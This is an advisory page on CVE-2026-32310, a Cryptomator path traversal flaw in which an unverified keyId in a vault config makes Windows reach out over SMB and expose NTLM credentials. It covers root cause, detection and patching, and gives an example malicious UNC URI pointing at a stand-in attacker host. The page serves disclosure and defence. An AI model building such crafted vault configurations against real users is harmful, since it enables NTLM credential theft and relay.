CVE-2026-32310 Overview
CVE-2026-32310 is a Path Traversal vulnerability affecting Cryptomator, a popular open-source encryption application for cloud storage. The vulnerability exists in how the application parses vault configurations before verifying their integrity. Specifically, the masterkeyfile loader uses an unverified keyId as a filesystem path, resolving keyId.getSchemeSpecificPart() directly against the vault path and immediately calling Files.exists(). This allows attackers to craft malicious vault configurations containing parent-directory escapes, absolute local paths, or UNC paths.
Critical Impact
On Windows systems, a malicious vault configuration can trigger outbound SMB access before the user even enters a passphrase, potentially exposing NTLM credentials to attacker-controlled servers via UNC path injection (e.g., masterkeyfile://attacker/share/masterkey.cryptomator).
Affected Products
- Cryptomator versions 1.6.0 to before 1.19.1
- Microsoft Windows (particularly vulnerable due to UNC path handling)
Discovery Timeline
- 2026-03-20 - CVE CVE-2026-32310 published to NVD
- 2026-03-25 - Last updated in NVD database
Technical Details for CVE-2026-32310
Vulnerability Analysis
This vulnerability is classified as CWE-22 (Path Traversal). The core issue stems from a trust-before-verify design flaw in Cryptomator's vault configuration handling. When a user attempts to open a vault, the application parses the configuration file and processes the keyId field to locate the master key file. However, this parsing and filesystem access occurs before the configuration's cryptographic integrity is verified.
The vulnerability is particularly dangerous on Windows systems due to how the Java Path.resolve() method handles UNC-style paths. When a path like //attacker/share/... is resolved, it becomes \\attacker\share\..., which triggers an SMB connection attempt. This behavior occurs during the Files.exists() check, meaning the operating system will attempt to authenticate to the remote SMB server before any user interaction beyond opening the vault.
Root Cause
The root cause is improper input validation combined with a flawed order of operations. The masterkeyfile loader resolves the keyId filesystem path without sanitizing or validating the input, and more critically, performs filesystem operations before verifying the vault configuration's integrity. This allows an attacker who can modify or create a malicious vault configuration to inject arbitrary filesystem paths that will be accessed when a victim attempts to open the vault.
Attack Vector
The attack vector is network-based but requires user interaction in the form of opening a malicious vault. An attacker could distribute a malicious vault configuration file through various means:
- Shared cloud storage: Since Cryptomator vaults are designed for cloud storage, an attacker with write access to a shared vault could modify the configuration
- Social engineering: Distributing a malicious vault archive via email, messaging, or file sharing platforms
- Compromised download sources: Replacing legitimate vault backups with malicious versions
On Windows systems, when the victim opens the malicious vault, the UNC path triggers an outbound SMB connection. This can lead to:
- NTLM credential relay attacks
- NTLM hash capture for offline cracking
- Information disclosure about the victim's network environment
The attack requires no authentication and can be executed without the victim entering any credentials into Cryptomator itself.
Detection Methods for CVE-2026-32310
Indicators of Compromise
- Unusual outbound SMB traffic (TCP port 445) to external IP addresses when opening Cryptomator vaults
- Vault configuration files containing suspicious masterkeyfile:// URIs with UNC paths or parent directory traversals (../)
- Network connections initiated by Cryptomator process to unknown external hosts
- Failed authentication attempts in Windows Security Event logs (Event ID 4625) correlating with Cryptomator usage
Detection Strategies
- Monitor outbound SMB connections from Cryptomator processes, especially to non-internal destinations
- Implement network segmentation rules blocking outbound SMB (port 445) to external networks
- Use endpoint detection to alert on file path traversal patterns in vault configuration files
- Deploy network monitoring to detect NTLM authentication attempts to untrusted servers
Monitoring Recommendations
- Enable Windows Security Event logging for authentication events and monitor for credential theft indicators
- Configure firewall rules to log and alert on outbound SMB traffic attempts
- Implement application whitelisting to monitor Cryptomator process behavior and network activity
- Review vault configuration files for unexpected or malformed keyId values before opening
How to Mitigate CVE-2026-32310
Immediate Actions Required
- Upgrade Cryptomator to version 1.19.1 or later immediately
- Block outbound SMB traffic (TCP port 445) to external networks at the firewall level
- Review any recently opened vaults for suspicious configuration entries
- Audit shared vault repositories for unauthorized configuration modifications
Patch Information
Cryptomator has released version 1.19.1 which addresses this vulnerability. The fix ensures that vault configuration integrity is verified before parsing and processing the keyId field. Users should update immediately through their package manager or by downloading from the official Cryptomator Release page.
For detailed technical information about the fix, see GitHub Pull Request #4180 and the security advisory GHSA-5phc-5pfx-hr52.
Workarounds
- Block outbound SMB traffic at the host firewall level to prevent NTLM credential exposure
- Only open vaults from trusted sources and verify vault integrity before opening
- Disable NTLM authentication where possible to reduce credential theft risk
- Use network monitoring to detect and block suspicious outbound connection attempts from Cryptomator
# Windows Firewall rule to block outbound SMB traffic
netsh advfirewall firewall add rule name="Block Outbound SMB" dir=out action=block protocol=tcp remoteport=445
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
